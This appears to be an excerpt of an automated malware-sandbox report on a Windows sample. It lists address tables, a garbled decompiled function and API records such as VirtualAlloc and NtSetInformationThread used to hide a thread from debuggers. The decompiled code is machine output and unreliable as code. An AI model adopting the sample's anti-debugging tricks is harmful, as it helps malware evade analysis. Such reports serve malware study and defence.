                    0x004019b0
                    0x004019b2
                    0x004019b4
                    0x004019b6
                    0x004019b8
                    0x004019ba
                    0x004019bc
                    0x004019be
                    0x004019bf
                    0x004019c2
                    0x004019c3
                    0x004019c5
                    0x004019c7
                    0x004019c9
                    0x004019ce
                    0x004019d0
                    0x004019d2
                    0x004019d4
                    0x004019d6
                    0x004019d8
                    0x004019db
                    0x004019de
                    0x004019e3
                    0x004019e5
                    0x004019e7
                    0x004019e9
                    0x004019eb
                    0x004019ed
                    0x004019ef
                    0x004019f2
                    0x004019f4
                    0x004019f6
                    0x004019f8
                    0x004019fa
                    0x004019fc
                    0x004019fe
                    0x00401a00
                    0x00401a03
                    0x00401a05
                    0x00401a07
                    0x00401a09
                    0x00401a0b
                    0x00401a0e
                    0x00401a0f
                    0x00401a12
                    0x00401a14
                    0x00401a16
                    0x00401a18
                    0x00401a1a
                    0x00401a1c
                    0x00401a1e
                    0x00401a20
                    0x00401a22
                    0x00401a24
                    0x00401a29
                    0x00401a2e
                    0x00401a2f
                    0x00401a32
                    0x00401a33
                    0x00401a36
                    0x00401a38
                    0x00401a3b
                    0x00401a41
                    0x00401a43
                    0x00401a45
                    0x00401a47
                    0x00401a49
                    0x00401a4b
                    0x00401a4d
                    0x00401a4f
                    0x00401a51
                    0x00401a53
                    0x00401a58
                    0x00401a59
                    0x00401a5a
                    0x00401a5b
                    0x00401a5b
                    0x00401a5b
                    0x00401a5e
                    0x00401ad2
                    0x00401ad2
                    0x00401ad3
                    0x00401ad4
                    0x00401ad8
                    0x00401a60
                    0x00401a60
                    0x00401acd
                    0x00401acd
                    0x00000000
                    0x00401a62
                    0x00401a62
                    0x00401a66
                    0x00401a68
                    0x00401a69
                    0x00401a6c
                    0x00401a6e
                    0x00401a72
                    0x00401a74
                    0x00401a75
                    0x00401a77
                    0x00401a7d
                    0x00401a7d
                    0x00401a7e
                    0x00401a82
                    0x00401a84
                    0x00401a8a
                    0x00401a8c
                    0x00401a8e
                    0x00401a90
                    0x00401a92
                    0x00401a94
                    0x00401a96
                    0x00401a98
                    0x00401a9a
                    0x00401a9d
                    0x00401aa0
                    0x00401aa2
                    0x00401aa4
                    0x00401aa6
                    0x00401aa8
                    0x00401aaa
                    0x00401aac
                    0x00401aae
                    0x00401ab0
                    0x00401ab2
                    0x00401ab4
                    0x00401ab6
                    0x00401ab8
                    0x00401aba
                    0x00401abc
                    0x00401ac1
                    0x00401ac3
                    0x00401ac6
                    0x00401ac8
                    0x00000000
                    0x00401ac8
                    0x00401a6c
                    0x00401a60
                    0x00401ad9
                    0x00401adb
                    0x00401add
                    0x00401adf
                    0x00401ae1
                    0x00401ae3
                    0x00401ae5
                    0x00401ae7
                    0x00401ae9
                    0x00401aeb
                    0x00401aed
                    0x00401aef
                    0x00401af1
                    0x00401af3
                    0x00401af5
                    0x00401af7
                    0x00401af9
                    0x00401afb
                    0x00401afd
                    0x00401aff
                    0x00401b01
                    0x00401b03
                    0x00401b07
                    0x00401b09
                    0x00401b0b
                    0x00401b0e
                    0x00401b0f
                    0x00401b16
                    0x00401b18
                    0x00401b1a
                    0x00401b1b
                    0x00401b1d
                    0x00401b1f
                    0x00401b25
                    0x00401b27
                    0x00401b29
                    0x00401b2b
                    0x00401b2d
                    0x00401b2e
                    0x00401b2f
                    0x00401b32
                    0x00401b33
                    0x00401b35
                    0x00401b37
                    0x00401b39
                    0x00401b3c
                    0x00401b3e
                    0x00401b40
                    0x00401b42
                    0x00401b44
                    0x00401b46
                    0x00401b48
                    0x00401b4a
                    0x00401b4b
                    0x00401b4d
                    0x00401b4f
                    0x00401b56
                    0x00401b58
                    0x00401b5a
                    0x00401b5b
                    0x00401b5d
                    0x00401b5f
                    0x00401b66
                    0x00401b69
                    0x00401b6c
                    0x00401b6e
                    0x00401b70
                    0x00401b71
                    0x00401b74
                    0x00401b7d
                    0x00401b80
                    0x00401b81
                    0x00401b83
                    0x00401b85
                    0x00401b87
                    0x00401b89
                    0x00401b8a
                    0x00401b8c
                    0x00401b92
                    0x00401b93
                    0x00401b96
                    0x00401b97
                    0x00401b9a
                    0x00401b9c
                    0x00401b9e
                    0x00401ba1
                    0x00401ba3
                    0x00401ba5
                    0x00401ba7
                    0x00401ba9
                    0x00401bab
                    0x00401bb2
                    0x00401bb6
                    0x00401bb9
                    0x00401bbb
                    0x00401bbd
                    0x00401bbf
                    0x00401bc9
                    0x00401bce
                    0x00401bcf
                    0x00401bd1
                    0x00401bd4
                    0x00401bd6
                    0x00401bd8
                    0x00401bda
                    0x00401bdc
                    0x00401bde
                    0x00401be0
                    0x00401be2
                    0x00401be4
                    0x00401be6
                    0x00401be8
                    0x00401bea
                    0x00401bec
                    0x00401bee
                    0x00401bf0
                    0x00401bf2
                    0x00401bf4
                    0x00401bf6
                    0x00401bf8
                    0x00401bfa
                    0x00401bfc
                    0x00401bfe
                    0x00401c00
                    0x00401c02
                    0x00401c04
                    0x00401c06
                    0x00401c08
                    0x00401c0a
                    0x00401c0c
                    0x00401c0e
                    0x00401c10
                    0x00401c12
                    0x00401c14
                    0x00401c16
                    0x00401c18
                    0x00401c1a
                    0x00401c1c
                    0x00401c1e
                    0x00401c20
                    0x00401c22
                    0x00401c24
                    0x00401c26
                    0x00401c28
                    0x00401c2a
                    0x00401c2c
                    0x00401c2e
                    0x00401c30
                    0x00401c32
                    0x00401c34
                    0x00401c36
                    0x00401c38
                    0x00401c3a
                    0x00401c3c
                    0x00401c3e
                    0x00401c40
                    0x00401c42
                    0x00401c44
                    0x00401c46
                    0x00401c48
                    0x00401c4a
                    0x00401c4c
                    0x00401c4e
                    0x00401c50
                    0x00401c51
                    0x00401c53
                    0x00401c55
                    0x00401c56
                    0x00401c57
                    0x00401c59
                    0x00401c5b
                    0x00401c5e
                    0x00401c5f
                    0x00401c61

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: #100
                    • String ID: VB5!6&*
                    • API String ID: 1341478452-3593831657
                    • Opcode ID: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                    • Instruction ID: 592f94a81c5e57ebd708ba545b2f23eeb9c7c156f30bca6655cae21d4670f76f
                    • Opcode Fuzzy Hash: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                    • Instruction Fuzzy Hash: C442CD3244E3C19FC7138B748DA26A27FB4EE1331471D49DFC8C19A1B3D2286A5AD766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403858, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 656memoryCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			E00403858() {
				signed int _t19;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed int _t24;
				signed int _t26;
				void* _t28;
				intOrPtr* _t29;
				void* _t36;
				signed int _t37;
				void* _t38;
				signed int _t39;
				signed int _t41;

				 *_t19 =  *_t19 ^ _t19;
				 *_t19 =  *_t19 + _t19;
				asm("cdq");
				asm("aaa");
				asm("bound ebx, [esi-0x45be77cf]");
				asm("xlatb");
				_t21 = _t36;
				_t37 = _t39;
				asm("lodsb");
				asm("salc");
				asm("popfd");
				asm("lodsd");
				_push(_t21);
				es =  *((intOrPtr*)(_t21 - 0x1e064eb6));
				_t22 = _t21;
				asm("stosb");
				 *((intOrPtr*)(_t22 - 0x2d)) =  *((intOrPtr*)(_t22 - 0x2d)) + _t22;
				_t23 = _t26 ^  *(_t29 - 0x48ee309a);
				_t28 = _t22;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				asm("adc eax, [ebx-0x7cf20000]");
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t29;
				_t10 = _t37 + 0x66;
				 *_t10 =  *((intOrPtr*)(_t37 + 0x66)) + _t29;
				asm("o16 jb 0x6b");
				asm("popad");
				if ( *_t10 <= 0) goto L1;
				_t24 = _t23 | 0x45000801;
				asm("insd");
				if(_t24 >= 0) {
					L5:
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					_push(_t24);
					asm("packssdw mm7, mm7");
					asm("packuswb xmm2, xmm6");
					asm("packuswb mm2, mm5");
					asm("packuswb xmm1, xmm1");
					asm("punpckhdq xmm6, xmm3");
					asm("punpckhbw xmm3, xmm3");
					asm("packuswb xmm2, xmm0");
					asm("packsswb xmm2, xmm7");
					asm("punpckhbw mm4, mm6");
					asm("packuswb mm7, mm1");
				}
				_t41 =  *(_t38 + 0x61) * 0x1190065;
				 *0xa2a719c1 =  *0xa2a719c1 + _t24;
				_t13 = _t38 + 0x6c000082;
				 *_t13 =  *(_t38 + 0x6c000082) & _t37;
				if ( *_t13 == 0) goto L3;
				 *((intOrPtr*)(_t38 + 0x42000082)) =  *((intOrPtr*)(_t38 + 0x42000082)) + 0xa2a719c1;
				asm("scasd");
				asm("lodsd");
				if (_t41 - 1 <= 0) goto L4;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *[ss:eax] =  *[ss:eax] + _t24;
				 *_t24 =  *_t24 + _t29;
				 *_t24 =  *_t24 + _t24;
				_t24 = _t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *0xa2a719c1 =  *0xa2a719c1 + _t28;
				 *_t24 =  *_t24 + _t24;
				 *_t29 =  *_t29 + _t24;
				 *_t24 =  *_t24 + _t28;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *((intOrPtr*)(_t24 + 0x82)) =  *((intOrPtr*)(_t24 + 0x82)) + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				goto L5;
			}
















                    0x0040385a
                    0x0040385c
                    0x0040385e
                    0x0040385f
                    0x00403860
                    0x00403866
                    0x00403868
                    0x00403868
                    0x00403869
                    0x0040386d
                    0x0040386f
                    0x00403870
                    0x00403871
                    0x00403872
                    0x00403886
                    0x00403888
                    0x00403889
                    0x0040388c
                    0x0040388c
                    0x0040388d
                    0x0040388f
                    0x00403891
                    0x00403893
                    0x00403895
                    0x00403897
                    0x00403899
                    0x0040389b
                    0x0040389d
                    0x0040389f
                    0x004038a1
                    0x004038a3
                    0x004038a5
                    0x004038a7
                    0x004038a9
                    0x004038ab
                    0x004038ad
                    0x004038af
                    0x004038b1
                    0x004038b7
                    0x004038b9
                    0x004038bb
                    0x004038bb
                    0x004038be
                    0x004038c2
                    0x004038c3
                    0x004038c5
                    0x004038ca
                    0x004038cb
                    0x00403931
                    0x00403931
                    0x00403933
                    0x00403935
                    0x00403937
                    0x00403939
                    0x0040393b
                    0x0040393d
                    0x0040393f
                    0x00403941
                    0x00403943
                    0x00403945
                    0x00403947
                    0x00403949
                    0x0040394b
                    0x0040394d
                    0x0040394f
                    0x00403951
                    0x00403953
                    0x00403955
                    0x00403957
                    0x00403959
                    0x0040395b
                    0x0040395d
                    0x0040395f
                    0x00403961
                    0x00403963
                    0x00403965
                    0x00403967
                    0x00403969
                    0x0040396b
                    0x0040396d
                    0x0040396f
                    0x00403971
                    0x00403973
                    0x00403975
                    0x00403977
                    0x00403979
                    0x0040397b
                    0x0040397d
                    0x0040397f
                    0x00403981
                    0x00403983
                    0x00403985
                    0x00403987
                    0x00403989
                    0x0040398b
                    0x0040398d
                    0x0040398f
                    0x00403991
                    0x00403993
                    0x00403995
                    0x00403997
                    0x00403999
                    0x0040399b
                    0x0040399d
                    0x0040399f
                    0x004039a1
                    0x004039a3
                    0x004039a5
                    0x004039a7
                    0x004039a9
                    0x004039ab
                    0x004039ad
                    0x004039af
                    0x004039b1
                    0x004039b3
                    0x004039b5
                    0x004039b7
                    0x004039b9
                    0x004039bb
                    0x004039bd
                    0x004039bf
                    0x004039c1
                    0x004039c3
                    0x004039c5
                    0x004039c7
                    0x004039c9
                    0x004039cb
                    0x004039cd
                    0x004039cf
                    0x004039d1
                    0x004039d3
                    0x004039d5
                    0x004039d7
                    0x004039d9
                    0x004039db
                    0x004039dd
                    0x004039df
                    0x004039e1
                    0x004039e3
                    0x004039e5
                    0x004039e7
                    0x004039e9
                    0x004039eb
                    0x004039ed
                    0x004039ef
                    0x004039f1
                    0x004039f3
                    0x004039f5
                    0x004039f7
                    0x004039f9
                    0x004039fb
                    0x004039ff
                    0x00403a2b
                    0x00403a54
                    0x00403a68
                    0x00403aa4
                    0x00403ac2
                    0x00403ae8
                    0x00403b0d
                    0x00403b44
                    0x00403b65
                    0x00403b6d
                    0x004038cd
                    0x004038d4
                    0x004038d7
                    0x004038d7
                    0x004038dd
                    0x004038df
                    0x004038e6
                    0x004038e7
                    0x004038e8
                    0x004038ea
                    0x004038ec
                    0x004038ee
                    0x004038f1
                    0x004038f3
                    0x004038f5
                    0x004038f7
                    0x004038f9
                    0x004038fb
                    0x004038fd
                    0x004038ff
                    0x00403901
                    0x00403903
                    0x00403905
                    0x0040390b
                    0x0040390d
                    0x0040390f
                    0x00403911
                    0x00403913
                    0x00403915
                    0x00403917
                    0x00403919
                    0x0040391b
                    0x0040391d
                    0x0040391f
                    0x00403921
                    0x00403923
                    0x00403925
                    0x00403927
                    0x00403929
                    0x0040392b
                    0x0040392d
                    0x0040392f
                    0x00000000

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                    • Instruction ID: 8e196667fc9cf8ea1f1595be977f2233d61e135b0e9b019b9f32fb53a38ceb6a
                    • Opcode Fuzzy Hash: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                    • Instruction Fuzzy Hash: FAF1D4D1A2E743C6E593657000C543159A4EEA735A6778BFB6723728C2A33E434B728F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003147EF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationThread
                    • String ID: 1.!T
                    • API String ID: 4046476035-3147410236
                    • Opcode ID: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                    • Instruction ID: 85c883a0b6f74242c6db4fb83a2c43c8e3cce5ace7b7cabbe30f0f702d8ef017
                    • Opcode Fuzzy Hash: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                    • Instruction Fuzzy Hash: A2317B74344309AAFB1E7E388D627EB26959F4D794F604129FD86AF2C1E7A4CCC0C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003104B2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98nativethreadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                    • Instruction ID: 95bfbbde8e5144fd09a4c1453872a684db2ea4c1e66b6ba3dcd28e41abbd3e20
                    • Opcode Fuzzy Hash: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                    • Instruction Fuzzy Hash: A4317C74344309AAFB1E7E388D627EB26999F4DB94F604119FD86AF1C1DBA4CCC1C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003104CD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                    • Instruction ID: 651d2a3533e24775b3298652591ca9047375c0cb40caef92a89f97d89c96af4b
                    • Opcode Fuzzy Hash: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                    • Instruction Fuzzy Hash: 30315C743443099AFB1E7E388D627EB26959F4D794F504119FD86AF2C1DBA4CCC1C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00310537, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87nativethreadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                    • Instruction ID: 145023c8836b2c3057a3b92ab1dda6820f5cc58f1fa64dfb65631a3512e0df95
                    • Opcode Fuzzy Hash: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                    • Instruction Fuzzy Hash: 6C217834344309AAFB1D6E388E62BE726999F49B94FA00119FD86AF2C1D7A0DCC0C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00310516, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84nativethreadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                    • Instruction ID: fa76eb0f0b08a5046f8d0dd58af47fec2d13c0ea543e048e164b98b1edea8d9f
                    • Opcode Fuzzy Hash: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                    • Instruction Fuzzy Hash: 81214974344309AAFB1E2E388D62BE722999F09BD4F900115FD86AF1C1E7A5C8C0C251
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003105D9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationThread
                    • String ID: 1.!T
                    • API String ID: 4046476035-3147410236
                    • Opcode ID: 6a2ee03b46db307b5a37b1d3fe185f7671c280c203ee62c2d50521e14eca7b9e
                    • Instruction ID: 763261b5dac38040d9648096c94685c16d5f65011d14262867c87dcde5b5a9ad
                    • Opcode Fuzzy Hash: 6a2ee03b46db307b5a37b1d3fe185f7671c280c203ee62c2d50521e14eca7b9e
                    • Instruction Fuzzy Hash: 02216A78205349ABFB1E6E388DB17DB37989F0A7A4F904119FC869F1C1D7A4C8C1C661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031059D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66nativethreadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: ee4061a47e12fe1cb0a2dacac262a7e618d3b7ff24a38530bca62724974c2d90
                    • Instruction ID: ee192c99c77cc6732be230f1b7ff71c4bcc3bac1d1bb41368fe7116eab0f5dde
                    • Opcode Fuzzy Hash: ee4061a47e12fe1cb0a2dacac262a7e618d3b7ff24a38530bca62724974c2d90
                    • Instruction Fuzzy Hash: EB1138743053499AFB2D6E388DA17DA3798EF49B94F600219FC56AB2C1D7A4D8C0C690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00312F56, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LdrInitializeThunk.NTDLL(0031157A,?,00000000,?,00000017,0000035D,?,003139E3,?), ref: 0031376A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: ninet.dll
                    • API String ID: 2994545307-2962335871
                    • Opcode ID: 8c6cb2a92d30fc999c743c1c07706b9559c33b4a09a460089fedd49e23e1355d
                    • Instruction ID: 94212b7027d7ef041e1e2f7ec0e6c9d518ef90ef182fd3f8adb91313b364d7a2
                    • Opcode Fuzzy Hash: 8c6cb2a92d30fc999c743c1c07706b9559c33b4a09a460089fedd49e23e1355d
                    • Instruction Fuzzy Hash: D0E0CD710056428BD31FB7144A47BD777A0DF45780F08C4795483C7562DB34B61DD646
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403AEE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 471memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
